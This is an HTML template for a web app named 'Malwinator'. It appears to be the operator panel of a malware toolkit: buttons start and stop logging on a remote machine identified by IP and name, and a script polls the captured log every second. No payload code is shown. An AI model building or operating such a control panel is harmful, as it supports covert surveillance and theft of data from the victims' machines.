<!DOCTYPE html>
<html>
<head>
    <title>Malwinator</title>
    <meta charset="US-ASCII">
    <link rel="stylesheet" href="{{url_for('static', filename='css/styles.css')}}">
    <script src="{{url_for('static', filename='js/log.js')}}" defer></script>
    
</head>
<body>
  <h1>{{message}}</h1>
  <h3 id="commandResult"></h3>
  <pre id = "log-data"></pre>
  <a class="btn" onclick="sendCommand('log')">Start Log</a>
  <a class="btn" onclick="sendCommand('end log')">Stop Log</a>
  <a class="btn btn-go-back" href="/toolkit?name={{name}}&ip={{ip}}">Go back</a>

  <script>
    ip = "{{ip}}"
    name = "{{name}}"

    function fetchLog() {
      path = "/getLog"
      const paragraph = document.getElementById('log-data');
      const formData = new FormData();
      formData.append("ip", ip);
      formData.append("name", name);

      fetch(uri + path, {
          method: "POST",
          body: formData
      })
          .then(response => {
              return response.text();
          })
          .then(text => {
              paragraph.textContent = text;
          })
          .catch(error => {
              console.error('Error', error);
          })
  }

  setInterval(fetchLog, 1000);
  </script>
</body>
</html>